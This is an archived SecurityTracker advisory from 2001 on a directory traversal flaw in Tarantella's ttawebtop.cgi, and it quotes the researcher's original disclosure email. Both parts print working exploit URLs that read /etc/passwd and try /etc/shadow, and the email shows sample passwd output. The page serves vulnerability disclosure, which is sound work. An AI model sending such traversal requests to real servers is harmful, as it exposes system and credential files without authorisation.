SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Tarantella Vendors:   Tarantella, Inc.
Tarantella Application Web Server Discloses Files on the Server to Remote Users
SecurityTracker Alert ID:  1001779
SecurityTracker URL:  http://securitytracker.com/id/1001779
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 19 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  

Description:   A vulnerability has been reported in the Tarantella application server that lets remote users obtain files located anywhere on the server.

The vunerability reportedly resides in the ttawebtop.cgi module.

If a remote user issues the following type of example URL, the server will return the world-readable password file:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

If a remote user attempts to retrieve a file that is not readable by the web server, it will return a 'file missing' error message, as shown below:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

File missing

The following file could not be found:

/tarantella/../../../../../../../../../../../../../../../etc/shadow

The vendor has reportedly been notified.

Impact:   A remote user can obtain world-readable files located anywhere from the server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.tarantella.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Caldera/SCO), Linux (Red Hat Linux), Linux (SuSE), Linux (Turbo Linux), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Has Fixed This Issue) Re: Tarantella Application Web Server Discloses Files on the Server to Remote Users
The vendor announces that they have fixed the problem. The vendor reports on which versions were vulnerable.



 Source Message Contents

Subject:  SCO Tarantella Remote file read via ttawebtop.cgi


SCO has been notified of this issue. 


-------- Original Message --------
Subject: SCO Tarantella Remote file read via ttawebtop.cgi
Date: Mon, 18 Jun 2001 13:06:41 -0400
From: KF <dotslash@snosoft.com>
To: recon@snosoft.com


http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/
...


No perms to shadow... 

http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

 
File missing

The following file could not be found:

                                              
/tarantella/../../../../../../../../../../../../../../../etc/shadow

 Please give this information to a Tarantella Administrator.

-KF

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC